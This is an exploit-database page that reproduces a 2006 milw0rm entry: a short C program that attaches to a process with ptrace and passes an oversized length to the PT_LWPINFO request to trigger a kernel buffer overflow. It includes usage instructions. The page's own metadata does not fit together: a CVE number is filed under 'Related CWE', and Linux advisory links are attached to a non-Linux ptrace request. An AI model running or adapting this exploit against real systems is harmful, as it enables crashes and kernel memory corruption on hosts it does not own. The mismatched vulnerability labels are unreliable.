header-logo
Suggest Exploit
vendor:
N/A
by:
milw0rm.com
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2006-4814
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0787/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-0001/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0211/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0014/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0014/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Exploit for CVE-2006-4814

This exploit is for CVE-2006-4814, a buffer overflow vulnerability in the ptrace system call. The exploit attaches to the process with the given PID and then calls the PT_LWPINFO ptrace request to trigger the overflow.

Mitigation:

The vulnerability can be mitigated by applying the appropriate security patches.
Source

Exploit-DB raw data:

#include <sys/types.h>
#include <sys/ptrace.h>
#include <unistd.h>
/* lol lol, exploit for http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419
thank you oh unknown, sincerely kokanin@gmail. usage: ./blah <pid you own> */

int main(int argc, char *argv[]){
	struct ptrace_lwpinfo *lol;
	ptrace(PT_ATTACH,atoi(argv[1]),NULL,0);
	wait(NULL);
	ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768);
}

// milw0rm.com [2006-10-12]

Navigation

Suggest Exploit

Services By CQR